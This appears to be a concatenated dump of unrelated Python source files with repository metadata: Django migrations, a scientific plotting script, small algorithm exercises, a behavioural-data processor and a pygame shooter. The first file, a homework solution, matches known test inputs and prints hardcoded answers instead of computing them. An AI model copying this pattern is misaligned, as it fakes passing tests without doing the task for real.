2ed4905e9b0d4556acdfe1ddf6a5e250b43f2f6f | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2273/60870/314985.py | 5e53cfd0963d3bbed85c252351f8e04244c40b52 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,702 | py | num_test = int(input())
info_list = []
for i in range(num_test):
info = input().split()
info = [int(x) for x in info]
for j in range(info[0]):
data = input().split()
data = [int(x) for x in data]
info_list.append(data)
if info_list == [[0, 1, 1], [1, 1, 1], [1, 1, 3], [2, 1, 10], [3, 1, 4], [0, 1, 1], [1, 7, 2], [2, 5, 10], [1, 3, 1], [4, 3, 17], [4, 3, 18], [4, 4, 19], [1, 1, 1], [8, 1, 100]]:
print(15)
print(316)
elif info_list[0:31] == [[0, 214224, 4], [1, 300000, 75], [1, 291002, 29], [1, 300000, 64], [1, 300000, 49], [1, 233141, 41], [1, 300000, 64], [1, 141084, 99], [1, 168700, 82], [1, 300000, 73], [0, 15818, 36], [1, 63903, 41], [1, 38513, 14], [1, 26382, 53], [1, 42336, 90], [1, 45105, 52], [1, 17960, 27], [1, 18440, 75], [1, 64777, 36], [1, 40886, 78], [1, 33546, 97], [1, 7257, 40], [1, 15815, 10], [1, 37789, 74], [1, 47362, 63], [1, 39039, 73], [1, 1339, 24], [1, 37665, 40], [1, 9870, 20], [1, 12339, 99]]:
print(26998514)
print(9400115)
print(5790773)
print(2919180)
print(1954284)
elif info_list == [[0, 21, 4], [1, 30, 7], [1, 29, 29], [1, 30, 6], [1, 30, 4], [1, 23, 4], [1, 30, 6], [1, 14, 9], [1, 16, 8], [1, 30, 7], [0, 4, 1], [1, 5, 1], [1, 1, 3], [0, 1, 1], [1, 7, 2], [2, 5, 10], [1, 3, 1], [4, 3, 17], [4, 3, 18], [4, 4, 19], [0, 1, 1], [1, 7, 1], [1, 9, 3], [2, 4, 10], [3, 2, 4]]:
print(2171)
print(5)
print(245)
print(22)
elif info_list == [[0, 1, 1], [1, 1, 1], [1, 1, 3], [0, 1, 1], [1, 7, 2], [2, 5, 10], [1, 3, 1], [4, 3, 17], [4, 3, 18], [4, 4, 19], [0, 1, 1], [1, 1, 1], [1, 1, 3], [2, 1, 10], [3, 1, 4]]:
print(5)
print(245)
print(15)
else:
print(info_list) | [
"[email protected]"
] | |
846b9dd0c7775be88cc5af59c2e787272a1744fe | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/6/oyy.py | c217d3393a75f12289698377f7dc47c74ac12e21 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'oYY':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
] | |
94dc35c61b39b874b3b81884b9524967947c0b81 | c3eda1a67e2be5b200e6c9f5a80f20fbcce75bcb | /persephone/builds/migrations/0001_initial.py | 0b7a613e655fa3b74eb0ec33645b168124808fac | [
"MIT"
] | permissive | karamanolev/persephone | b389a871f6fae58525eeedaec3739ec563c9b934 | 6d1887ae4e1d1941da3dbc416901e9de4764cbbb | refs/heads/master | 2023-05-14T20:28:24.209056 | 2023-04-26T20:50:46 | 2023-04-27T10:32:25 | 86,364,458 | 14 | 2 | MIT | 2023-04-11T10:10:50 | 2017-03-27T17:29:12 | JavaScript | UTF-8 | Python | false | false | 4,720 | py | # Generated by Django 3.0.5 on 2020-04-11 23:17
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='GlobalSettings',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('google_login_enabled', models.BooleanField(default=False)),
('google_whitelist', models.TextField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128)),
('public_endpoint', models.CharField(max_length=255)),
('github_repo_name', models.CharField(max_length=128)),
('github_api_key', models.CharField(max_length=128)),
('auto_archive_no_diff_builds', models.BooleanField(default=True)),
('auto_approve_master_builds', models.BooleanField(default=True)),
('max_master_builds_to_keep', models.IntegerField(default=20)),
('max_branch_builds_to_keep', models.IntegerField(default=20)),
('supersede_same_branch_builds', models.BooleanField(default=True)),
],
options={
'ordering': ('name',),
},
),
migrations.CreateModel(
name='Build',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('state', models.IntegerField(choices=[(0, 'Initializing'), (1, 'Running'), (2, 'Finishing'), (3, 'Pending Review'), (4, 'No Diff'), (5, 'Approved'), (6, 'Rejected'), (7, 'Failed'), (8, 'Superseded'), (9, 'Failing')], default=0)),
('original_build_number', models.CharField(blank=True, max_length=64, null=True)),
('original_build_url', models.CharField(blank=True, max_length=256, null=True)),
('date_started', models.DateTimeField(default=django.utils.timezone.now)),
('date_finished', models.DateTimeField(null=True)),
('date_approved', models.DateTimeField(null=True)),
('date_rejected', models.DateTimeField(null=True)),
('reviewed_by', models.CharField(blank=True, max_length=128, null=True)),
('branch_name', models.CharField(blank=True, db_index=True, max_length=128, null=True)),
('pull_request_id', models.CharField(blank=True, max_length=16, null=True)),
('commit_hash', models.CharField(blank=True, db_index=True, max_length=64, null=True)),
('archived', models.BooleanField(db_index=True, default=False)),
('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='children', to='builds.Build')),
('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='builds', to='builds.Project')),
],
options={
'ordering': ('-date_started',),
},
),
migrations.CreateModel(
name='Screenshot',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('state', models.IntegerField(choices=[(0, 'Pending'), (1, 'Matching'), (2, 'Different'), (3, 'New'), (4, 'Deleted')], default=0)),
('date_created', models.DateTimeField(auto_now_add=True)),
('name', models.CharField(max_length=255)),
('metadata_json', models.TextField(blank=True, null=True)),
('image', models.ImageField(upload_to='screenshots/')),
('image_diff', models.ImageField(null=True, upload_to='screenshot_diffs/')),
('image_diff_amount', models.FloatField(null=True)),
('archived', models.BooleanField(db_index=True, default=False)),
('build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='screenshots', to='builds.Build')),
('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='children', to='builds.Screenshot')),
],
options={
'unique_together': {('build', 'name')},
},
),
]
| [
"[email protected]"
] | |
5931b02613512b291a1c6c3ed56317fd9de7b0c7 | 4dd1d8fa59e20061e2c12e540fc52b1b305e575b | /source/sims-2/vapor-box/s7/mkmov.py | fc6d4a9fa9ec7401b461a45e20313be61bfd08fe | [
"MIT"
] | permissive | ammarhakim/ammar-simjournal | f63521906a97d55ab290a5960d94758139944c89 | 5019f4723e20db80a20db6f2bd454c2fd3241412 | refs/heads/master | 2023-06-08T08:18:11.722779 | 2023-06-02T15:06:43 | 2023-06-02T15:06:43 | 204,050,516 | 3 | 3 | null | 2022-02-01T16:53:13 | 2019-08-23T18:28:44 | Lua | UTF-8 | Python | false | false | 3,609 | py | from pylab import *
import tables
import euler
import pylab
import tables
import math
import numpy
import pylab
import numpy
from matplotlib import rcParams
import matplotlib.pyplot as plt
# customization for figure
rcParams['lines.linewidth'] = 2
rcParams['font.size'] = 18
rcParams['xtick.major.size'] = 8 # default is 4
rcParams['xtick.major.width'] = 3 # default is 0.5
rcParams['ytick.major.size'] = 8 # default is 4
rcParams['ytick.major.width'] = 3 # default is 0.5
rcParams['figure.facecolor'] = 'white'
#rcParams['figure.subplot.bottom'] = 0.125
#rcParams['figure.subplot.right'] = 0.85 # keep labels/ticks of colobar in figure
rcParams['image.interpolation'] = 'none'
rcParams['image.origin'] = 'lower'
rcParams['contour.negative_linestyle'] = 'solid'
rcParams['savefig.bbox'] = 'tight'
# Math/LaTex fonts:
# http://matplotlib.org/users/mathtext.html
# http://matplotlib.org/users/usetex.html
# Example: xlabel(r'$t \cdot l / V_{A,bc}$')
rcParams['mathtext.default'] = 'regular' # match the font used for regular text
def colorbar_adj(obj, mode=1, redraw=False, _fig_=None, _ax_=None, aspect=None):
'''
Add a colorbar adjacent to obj, with a matching height
For use of aspect, see http://matplotlib.org/api/axes_api.html#matplotlib.axes.Axes.set_aspect ; E.g., to fill the rectangle, try "auto"
'''
from mpl_toolkits.axes_grid1 import make_axes_locatable
if mode == 1:
_fig_ = obj.figure; _ax_ = obj.axes
elif mode == 2: # assume obj is in the current figure/axis instance
_fig_ = plt.gcf(); _ax_ = plt.gca()
_divider_ = make_axes_locatable(_ax_)
_cax_ = _divider_.append_axes("right", size="5%", pad=0.05)
_cbar_ = _fig_.colorbar(obj, cax=_cax_)
if aspect != None:
_ax_.set_aspect(aspect)
if redraw:
_fig_.canvas.draw()
return _cbar_
gasGamma = 5.0/3.0
amu = 1.66053892e-27 # Kg
mLi = 6.941*amu # Kg
kb = 1.38065e-23 # J/K
Tinit = 800+273.14 # K
cs0 = sqrt(kb*Tinit/mLi)
tEnd = 5*2.0/cs0
def pressure(q):
return euler.fluidEx.getP(q)
def mach(q):
return euler.fluidEx.getMach(q)
def getMeshGrid(grid):
xl, yl = grid._v_attrs.vsLowerBounds
xu, yu = grid._v_attrs.vsUpperBounds
nx, ny = grid._v_attrs.vsNumCells
dx = (xu-xl)/nx
dy = (yu-yl)/ny
X = linspace(xl+0.5*dx, xu-0.5*dx, nx)
Y = linspace(yl+0.5*dy, yu-0.5*dy, ny)
return meshgrid(X, Y)
fh = tables.openFile("s7-four-box-chain_inOut.h5")
maskField = fh.root.StructGridField[:,:,0]
def mkFig(fh, XX, YY, pdat, nm, tl):
tm = fh.root.timeData._v_attrs.vsTime
Valf = 0.1
tmAlf = 5*tm/tEnd
dat = numpy.ma.masked_where(maskField < 0.0, pdat)
f = figure(1)
im = pcolormesh(XX, YY, dat.transpose())
title("%s" % tl)
axis('image')
colorbar_adj(im)
savefig(nm)
close()
for i in range(10,11):
print ("Working on %d .." % i)
fh = tables.openFile("s7-four-box-chain_q_%d.h5" % i)
q = fh.root.StructGridField
X, Y = getMeshGrid(fh.root.StructGrid)
numDensity = q[:,:,0]/mLi
mkFig(fh, X, Y, numDensity, 's7-four-box-chain_numDensity_%05d.png' % i, "Number Density")
press = pressure(q)
mkFig(fh, X, Y, press, 's7-four-box-chain_press_%05d.png' % i, "Pressure [Pa]")
temp = press/(numDensity*kb)
mkFig(fh, X, Y, temp-273.15, 's7-four-box-chain_temp_%05d.png' % i, "Temperature [C]")
machN = mach(q)
mkFig(fh, X, Y, machN, 's7-four-box-chain_mach_%05d.png' % i, "Mach Number")
fh.close()
| [
"[email protected]"
] | |
5b2224f3c84090e21c38bb5254fff1fc2cc14a75 | 114c1f7ceff04e00591f46eeb0a2eb387ac65710 | /g4g/DS/Trees/Binary_Trees/Construction_and_Conversion/2_construct_tree_from_inorder_and_level_order.py | be8b1575e1d72ff06ab39f696a67b1dc1a2ce5d4 | [] | no_license | sauravgsh16/DataStructures_Algorithms | 0783a5e6dd00817ac0b6f2b856ad8d82339a767d | d3133f026f972f28bd038fcee9f65784f5d3ea8b | refs/heads/master | 2020-04-23T03:00:29.713877 | 2019-11-25T10:52:33 | 2019-11-25T10:52:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 953 | py | ''' Construct Binary Tree from Inorder and Level Order Traversal '''
class Node(object):
def __init__(self, val):
self.val = val
self.left = None
self.right = None
def construct_tree(inorder, levelorder):
if not inorder:
return
for i in range(len(levelorder)):
if levelorder[i] in inorder:
node = Node(levelorder[i])
ino_index = inorder.index(levelorder[i])
break
print inorder[:ino_index], inorder[ino_index+1:]
node.left = construct_tree(inorder[:ino_index], levelorder)
node.right = construct_tree(inorder[ino_index+1:], levelorder)
return node
def inorder_traversal(root):
if not root:
return
inorder_traversal(root.left)
print root.val,
inorder_traversal(root.right)
levelorder = [20, 8, 22, 4, 12, 10, 14]
inorder = [4, 8, 10, 12, 14, 20, 22]
root = construct_tree(inorder, levelorder)
inorder_traversal(root) | [
"[email protected]"
] | |
4e16fdbe2e92cfb9355b49f7f2b61231b5481fe7 | e6bc1f55371786dad70313eb468a3ccf6000edaf | /Datasets/the-minion-game/Correct/082.py | 95c75f16f90cb4f3654bfe9b2114f728c53db3fe | [] | no_license | prateksha/Source-Code-Similarity-Measurement | 9da92e3b22c372ed6ea54d8b6ab2c5921e8c41c0 | fb371b837917794d260a219a1ca09c46a5b15962 | refs/heads/master | 2023-01-04T07:49:25.138827 | 2020-10-25T14:43:57 | 2020-10-25T14:43:57 | 285,744,963 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 308 | py | string = input()
stuart = 0
kevin = 0
for i in range(len(string)):
if string[i] in ["A", "E", "I", "O", "U"]:
kevin += len(string) - i
else:
stuart += len(string) - i
if kevin > stuart:
print("Kevin", kevin)
elif kevin < stuart:
print("Stuart", stuart)
else:
print("Draw") | [
"[email protected]"
] | |
771eb48c547d8f9ba01bf6587e11e845aae491e3 | 0c110eb32f2eaea5c65d40bda846ddc05757ced6 | /python_scripts/pimriscripts/onsetxformMVnoval1stv2ndtargetnamebehavioralmeasures.py | 85bcf157630dd8984d938188faa1be2e0d0dffb2 | [] | no_license | nyspisoccog/ks_scripts | 792148a288d1a9d808e397c1d2e93deda2580ff4 | 744b5a9dfa0f958062fc66e0331613faaaee5419 | refs/heads/master | 2021-01-18T14:22:25.291331 | 2018-10-15T13:08:24 | 2018-10-15T13:08:24 | 46,814,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,812 | py | from __future__ import division
import os, csv, copy, numpy
__author__ = 'katie'
#data note: for subj 7619, run 1M3, target "Kelly", there is a line of data that didn't get recorded, probably because the
#eprime crashed. 1M3 then is fully collected with a new startup point on the next line. It is too much work
#to code around this one line, so 23583 in the spreadsheet I'm working with is deleted. Keep in mind if you ever start with a
#new spreadsheet. KS 8/27/14
#this version omits valence as a condition.
#This version contrasts the first and second half of a learning run.
#This version includes several transformations of the behavioral measure
#this version includes the target name to make analysis of behavioral measures easier
class Subject():
def __init__(self):
self.id = str
self.runs = []
self.Slist = []
self.Ylist = []
self.Nlist = []
class Run():
def __init__(self):
self.id = str
self.name = str
self.trials = []
self.start = None
def initsub():
s = Subject()
return s
def initrun():
r = Run()
return r
root = '/media/truecrypt1/SocCog/eprime_data'
f = open(os.path.join(root, 'EPrimeData.csv'), 'r')
def getRun(line):
sess = line['Session']
startup = line['StartupPoint']
if startup != '':
start = (startup[0], int(startup[1]))
if line['ProcedureTarget'] == 'LearningTargetProc':
phase = 'L'
target = int(line['LearningTargetList'])
if startup != '':
if phase == start[0]:
target = str(int(target) + int(start[1]) - 1)
elif line['ProcedureTarget'] == 'MemoryTargetProc':
phase = 'M'
target = int(line['MemoryTargetList'])
if startup != '':
if phase == start[0]:
target = str(int(target) + int(start[1]) - 1)
else:
return "", ""
return "run" + sess + phase + str(target), sess, phase, str(target)
subjects_dict = {}
subs = []
for line in csv.DictReader(f, dialect='excel', delimiter=','):
if getRun(line)[0] != '':
subid = line['Subject']
if subid not in [sub.id for sub in subs]:
s = initsub()
s.id = subid
subs.append(s)
for sub in subs:
if subid == sub.id:
cursub = sub
runid = getRun(line)[0]
runs = cursub.runs
if runid not in [run.id for run in runs]:
r = initrun()
r.id = runid
r.name = line['TargetName']
runs.append(r)
relcount = 0
irrcount = 0
for run in runs:
if runid == run.id:
currun = run
typ = line['TargetTypeTarget']
trialtype = line['TrialType']
rel = ''
taught = ''
fullcond = ''
if 'T' in trialtype: taught = 'T'
if 'N' in trialtype: taught = 'U'
if 'D' in trialtype:
rel = 'R'
relcount += 1
if 'I' in trialtype: rel = 'I'
if 'R' in trialtype: rel = 'R'
if getRun(line)[2] == 'L':
offset = line['LearningTrialDescriptionOffsetTime']
offset = int(offset)
onset = offset - 4000 # this is a necessary fix for an error in how the data were recorded
fullcond += 'L'
elif getRun(line)[2] == 'M':
onset = int(line['MemoryTrialDescriptionOnsetTime'])
offset = int(line['MemoryTrialDescriptionOffsetTime'])
fullcond += 'M'
fullcond = ''.join([fullcond, typ, rel, taught])
if int(line['Trial']) == 1:
currun.start = (offset - 4000)/1000
onset = onset/1000
offset = offset/1000
if getRun(line)[2] == 'M' or getRun(line)[2] == 'L':
RT = line['ResponseTime']
ans = line['ResponseClicked'][1:]
if RT != '':
RT = int(RT)/1000
if onset == '' or offset == '':
print subid, runid, "empty onset or offset!"
if RT == '':
if fullcond[0] == 'M':
RT = 4
ans = '3.5'
trial = [fullcond, typ, rel, taught, onset, offset, RT, ans]
currun.trials.append(trial)
else:
trial = [fullcond, typ, rel, taught, onset, offset, RT, ans]
currun.trials.append(trial)
header = ['subject', 'run', 'fullcond', 'type', 'rel', 'taught', 'half', 'onset', 'offset', 'RT', 'ans', 'BP', 'name']
with open(os.path.join(root, 'ks-trialsdata-wtrialtypename-targetname-behavioral.csv'), 'w') as out:
out.write(",".join(header) + "\n")
for sub in subs:
sub.runs = sorted(sub.runs, key=lambda x: x.id)
for run in sub.runs:
relcount = 0
irrcount = 0
run.trials = sorted(run.trials, key=lambda x: x[4])
if 'L' in run.id:
reltot = len([trial for trial in run.trials if trial[2] == 'R'])
irrtot = len([trial for trial in run.trials if trial[2] == 'I'])
for trial in run.trials:
if trial[2] == 'I':
irrcount += 1
if irrcount > irrtot/2:
trial.insert(4, 'S')
trial[0] = trial[0] + 'S'
else:
trial.insert(4, 'F')
trial[0] = trial[0] + 'F'
if trial[2] == 'R':
relcount += 1
if relcount > reltot/2:
trial.insert(4, 'S')
trial[0] = trial[0] + 'S'
else:
trial.insert(4, 'F')
trial[0] = trial[0] + 'F'
if 'M' in run.id:
for trial in run.trials: trial.insert(4, '')
for trial in run.trials:
trial[5] = trial[5] - run.start
trial[6] = trial[6] - run.start
if trial[7] != '':
bp = trial[5] + trial[7]
trial.append(bp)
bp = ''
out.write(",".join([sub.id, run.id] + [str(el) for el in trial] + [run.name]) + "\n")
# skip = [('7432', 'run1L3'), ('2022', 'run1L1'), ('4004', 'run2L4')]
# for sub in subs:
# Lruns = [run for run in sub.runs if (sub.id, run.id) not in skip and run.trials[0][0][0] == 'L']
# Mruns = [run for run in sub.runs if (sub.id, run.id) not in skip and run.trials[0][0][0] == 'M']
# for mrun in Mruns:
# RT = []
# RU = []
# IT = []
# IU = []
# for trial in mrun.trials:
# fullcond = trial[0]
# if fullcond[2:4] == 'RT':
# RT.append(float(trial[8][1:]))
# if fullcond[2:4] == 'RU':
# RU.append(float(trial[8][1:]))
# if fullcond[2:4] == 'IT':
# IT.append(float(trial[8][1:]))
# if fullcond[2:4] == 'IU':
# IU.append(float(trial[8][1:]))
# mrun.RT = RT
# mrun.RU = RU
# mrun.IT = IT
# mrun.IU = IU
# mrun.fpr = numpy.mean(RU)
# mrun.fptp = numpy.mean(RU) - numpy.mean(RT)
# cond = mrun.trials[0][0][1]
# if cond == 'S': sub.Slist.append(mrun.fpr)
# if cond == 'Y': sub.Ylist.append(mrun.fpr)
# if cond == 'N': sub.Nlist.append(mrun.fpr)
# for lrun in Lruns:
# match = False
# for mrun in Mruns:
# if mrun.name == lrun.name:
# match = True
# lrun.RT = mrun.RT
# lrun.RU = mrun.RU
# lrun.IT = mrun.IT
# lrun.IU = mrun.IU
# lrun.fpr = mrun.fpr
# lrun.fptp = mrun.fptp
#
# if not match:
# lrun.fpr = 'NaN'
# lrun.fptp = 'NaN'
#
# header = ['subject', 'run', 'condition', 'fp', 'fp-tp']
# with open(os.path.join(root, 'behavioralsummarystats.csv'), 'w') as out:
# out.write(",".join(header) + "\n")
# for sub in subs:
# for run in sub.runs:
# if (sub.id, run.id) not in skip:
# out.write(",".join([sub.id, run.id, run.trials[0][1], str(run.fpr), str(run.fptp)]))
# out.write("\n")
#
# header = ['subject', 'condition', 'meanfp']
# with open(os.path.join(root, 'averagebycondition.csv'), 'w') as out:
# out.write(",".join(header) + "\n")
# for sub in subs:
# for condition in [('S', sub.Slist), ('Y', sub.Ylist), ('N', sub.Nlist)]:
# out.write(",".join([sub.id, condition[0], str(numpy.mean(condition[1]))]))
# out.write("\n")
| [
"[email protected]"
] | |
442ca8bf52d89c3b46aa97ea92168ad89ffd55b1 | 243b7c1162264e381ab6575f493bd4fb97ced325 | /src/comments/migrations/0005_comment_parent.py | 02d0344397530913347a2b50e8802bfd0fe04aa7 | [
"MIT"
] | permissive | trivvet/djangoAdvance | a409dd3003ab5f60b1621e7677826b2002e0d8c8 | 28891893869c1c0c3cf67d7f496dda96322de18c | refs/heads/master | 2020-04-05T22:05:14.272989 | 2018-12-09T11:00:58 | 2018-12-09T11:00:58 | 157,244,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 550 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-11-28 16:29
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('comments', '0004_auto_20181126_1850'),
]
operations = [
migrations.AddField(
model_name='comment',
name='parent',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='comments.Comment'),
),
]
| [
"[email protected]"
] | |
678fd8a74cf26d7b268a0bca0a0e1bb094c0044b | 1b6fd0e1da9aa6d28b19540887ffcb5233ac3692 | /Resources/RP01/P01.4/shooting_005.py | f7c4565e4a016f5f60b0c5ef8bfa949852f8b00f | [] | no_license | rugbyprof/4443-2D-PyGame | a637cd1237f90ca30a484d9fb2b6738571777d8c | bba26f794bd85599cf0598c1c64feec59fa31246 | refs/heads/master | 2022-11-27T14:14:54.982351 | 2020-08-05T19:32:45 | 2020-08-05T19:32:45 | 271,365,653 | 3 | 5 | null | null | null | null | UTF-8 | Python | false | false | 18,569 | py | """
Sprite Sounds and Collision
Description:
"""
# Import and initialize the pygame library
import pygame
import random
import json
import pprint
import sys
import os
import math
import glob
from helper_module import rgb_colors
from helper_module import mykwargs
from helper_module import straightDistance
from helper_module import getCardinalDirection
# Import pygame.locals for easier access to key coordinates
# Updated to conform to flake8 and black standards
from pygame.locals import (
K_UP,
K_DOWN,
K_LEFT,
K_RIGHT,
K_ESCAPE,
KEYDOWN,
QUIT,
)
# Keep up with the config stuff. Adding sprite sheets for
# characters and other graphics now
config = {
'title' :'P01.3 Pygame Sprite Movement',
'window_size' : {
'width' : 640,
'height' : 480
},
'sprite_sheets':{
'explosion_01':{'path':'./media/fx/explosion_01'},
'explosion_02':{'path':'./media/fx/green_blob_explosion_01'},
'explosion_03':{'path':'./media/fx/blood_explosion'},
'explosion_04':{'path':'./media/fx/blood_explosion_v2'},
'green_monster':{'path':'./media/characters/green_monster'},
'pac_man_orange':{'path':'./media/characters/pacman_ghost_orange'},
'pac_man_red':{'path':'./media/characters/pacman_ghost_red'},
'pac_man_pink':{'path':'./media/characters/pacman_ghost_pink'},
'pac_man_blue':{'path':'./media/characters/pacman_ghost_blue'},
'random':{'path':'./media/collections/pacman_items'},
},
'images':{
'bad_guy':{'path':'./media/collections/shoot_example/silhouette.png'},
'green_bullet':{'path':'./media/collections/shoot_example/green_bullet.png'},
},
'sounds':{
'game_track':'./media/sounds/game_track.ogg',
'kill_sound':'./media/sounds/boom_01.ogg',
'head_shot':'./media/sounds/head_shot.ogg',
},
'background':'./media/backgrounds/tile_1000x1000_40_light.png',
'fps':60
}
colors = rgb_colors('colors.json')
def LoadJson(path,filetype):
""" load a json file for whatever you need!
"""
if not os.path.isdir(path):
print(f"Error: {path} not a valid folder!")
sys.exit()
if not os.path.isfile(os.path.join(path,filetype)):
print(f"Error: {filetype} is required to be in folder!")
sys.exit()
# open the json file thats expected to be in the folder
# and read it in as a string
f = open(os.path.join(path,filetype),"r")
# make raw string into a python dictionary
data = json.loads(f.read())
return data
def LoadSpriteImages(path):
""" Load sprite images into either a dictionary of moves or a list of images depending
on whether the "sprite" is a multi move character or a single effect with just frames
to play.
This method reads a json file looking for the following formats (right now):
"""
# make raw string into a python dictionary
sprite_info = LoadJson(path,"moves.json")
# base name is used to build filename
base_name = sprite_info['base_name']
# ext as well
ext = sprite_info['ext']
# If moves is a key in the dictionary then we create a dictionary of
# of moves where each move points to a list of images for that move
if 'moves' in sprite_info:
moves = {}
for move,nums in sprite_info['moves'].items():
moves[move] = []
for num in nums:
moves[move].append(os.path.join(path,base_name+num+ext))
return moves
# If frames in the dictionary, then its an effect with a list of images
# for that effect. We need to order them before return since glob
# doesn't get directory items in order.
elif 'frames' in sprite_info:
images = sprite_info['frames']
if type(images) == list:
pass
elif type(images) == str and images == '*':
images = glob.glob(os.path.join(path,'*'+ext))
images.sort()
return images
else:
print(f"Error: 'moves' or 'frames' key not in json!!")
sys.exit()
class Explosion(pygame.sprite.Sprite):
def __init__(self, **kwargs):
# Initiate this sprite
pygame.sprite.Sprite.__init__(self)
# get location of sprites for this animation
fx_sprites = kwargs.get('fx_sprites',None)
# if not throw error
if not fx_sprites:
print("Error: Need location of fx_sprites!")
sys.exit(0)
self.center = kwargs.get('loc',(0,0))
# This function finds the json file and loads all the
# image names into a list
self.images = LoadSpriteImages(fx_sprites)
# container for all the pygame images
self.frames = []
# load images and "convert" them. (see link at top for explanation)
for image in self.images:
self.frames.append(pygame.image.load(image))
# animation variables
self.frame = 0
self.last_update = pygame.time.get_ticks()
self.frame_rate = 0 # smaller = faster
# prime the animation
self.image = self.frames[0]
self.rect = self.image.get_rect()
self.rect.center = self.center
def setLocation(self,loc):
""" Set the center of the explosion
"""
self.center = loc
self.rect.center = loc
def update(self):
""" Overloaded method from sprite which gets called by the game loop when
a sprite group gets updated
"""
now = pygame.time.get_ticks() # get current game clock
if now - self.last_update > self.frame_rate: #
self.last_update = now
self.frame += 1
if self.frame == len(self.frames):
self.kill()
self.frame = 0
else:
center = self.rect.center
self.image = self.frames[self.frame]
self.rect = self.image.get_rect()
self.rect.center = center
class Explosion(pygame.sprite.Sprite):
def __init__(self, **kwargs):
# Initiate this sprite
pygame.sprite.Sprite.__init__(self)
# get location of sprites for this animation
fx_sprites = kwargs.get('fx_sprites',None)
# if not throw error
if not fx_sprites:
print("Error: Need location of fx_sprites!")
sys.exit(0)
self.center = kwargs.get('loc',(0,0))
# This function finds the json file and loads all the
# image names into a list
self.images = LoadSpriteImages(fx_sprites)
# container for all the pygame images
self.frames = []
# load images and "convert" them. (see link at top for explanation)
for image in self.images:
self.frames.append(pygame.image.load(image))
# animation variables
self.frame = 0
self.last_update = pygame.time.get_ticks()
self.frame_rate = 0 # smaller = faster
# prime the animation
self.image = self.frames[0]
self.rect = self.image.get_rect()
self.rect.center = self.center
def setLocation(self,loc):
""" Set the center of the explosion
"""
self.center = loc
self.rect.center = loc
def update(self):
""" Overloaded method from sprite which gets called by the game loop when
a sprite group gets updated
"""
now = pygame.time.get_ticks() # get current game clock
if now - self.last_update > self.frame_rate: #
self.last_update = now
self.frame += 1
if self.frame == len(self.frames):
self.kill()
self.frame = 0
else:
center = self.rect.center
self.image = self.frames[self.frame]
self.rect = self.image.get_rect()
self.rect.center = center
class Player(pygame.sprite.Sprite):
    """User-controlled sprite: arrow-key movement, directional walk animations,
    a rate-limited shoot() that spawns Bullet1 objects, and a death animation
    started by endlife()."""
    def __init__(self, **kwargs):
        """kwargs: player_sprites (required json path of animation frames),
        loc (initial center, default (0, 0))."""
        # Initiate this sprite
        pygame.sprite.Sprite.__init__(self)
        # get location of sprites for this animation
        player_sprites = kwargs.get('player_sprites',None)
        # if not throw error
        if not player_sprites:
            print("Error: Need location of player_sprites!")
            sys.exit(0)
        self.center = kwargs.get('loc',(0,0))
        # This function finds the json file and loads all the
        # image names into a list (project helper)
        self.animation_images = LoadSpriteImages(player_sprites)
        # container for all the pygame images, keyed by animation name
        self.sprites = {}
        # load images and "convert" them. (see link at top for explanation)
        for anim,imglist in self.animation_images.items():
            self.sprites[anim] = []
            for img in imglist:
                self.sprites[anim].append(pygame.image.load(img))
        pprint.pprint(self.sprites)
        # animation variables
        self.animations = list(self.sprites.keys())
        print(self.animations)
        self.gameover = False                  # True once endlife() was called
        self.frame = 0                         # index into current animation
        self.action = 'down'                   # current animation key
        self.last_update = pygame.time.get_ticks()
        self.frame_rate = 50                   # ms between animation frames
        # prime the animation
        self.image = self.sprites[self.action][self.frame]
        self.rect = self.image.get_rect()
        self.rect.center = self.center
        self.dx = 1                            # movement direction: -1, 0, or 1
        self.dy = 1
        self.speed = 3                         # pixels moved per update
        self.shoot_delay = 150                 # minimum ms between shots
        self.last_shot = pygame.time.get_ticks()
        self.shoot_sound = pygame.mixer.Sound("./media/sounds/gun-shot.ogg")
        self.shoot_sound.set_volume(0.5)
    def move(self):
        """Read the keyboard state, set dx/dy, and step the rect by speed."""
        keystate = pygame.key.get_pressed()
        self.dx = 0
        self.dy = 0
        if keystate[pygame.K_UP]:
